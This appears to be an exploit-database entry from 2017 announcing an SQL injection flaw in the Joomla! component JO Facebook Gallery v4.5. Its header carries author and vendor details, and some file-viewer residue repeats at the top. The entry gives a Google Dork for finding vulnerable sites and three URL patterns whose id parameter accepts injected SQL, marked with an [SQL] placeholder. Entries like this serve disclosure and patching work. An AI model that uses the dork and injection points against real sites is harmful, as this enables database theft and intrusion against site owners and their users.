19 lines
No EOL
834 B
Text
19 lines
No EOL
834 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_jofacebookgallery
|
|
# Date: 24.02.2017
|
|
# Vendor Homepage: http://joomcore.com/joomla32/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-media/jo-facebook-gallery/
|
|
# Demo: http://demo.joomcore.com/joomla32/
|
|
# Version: 4.5
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL]
|
|
# # # # # |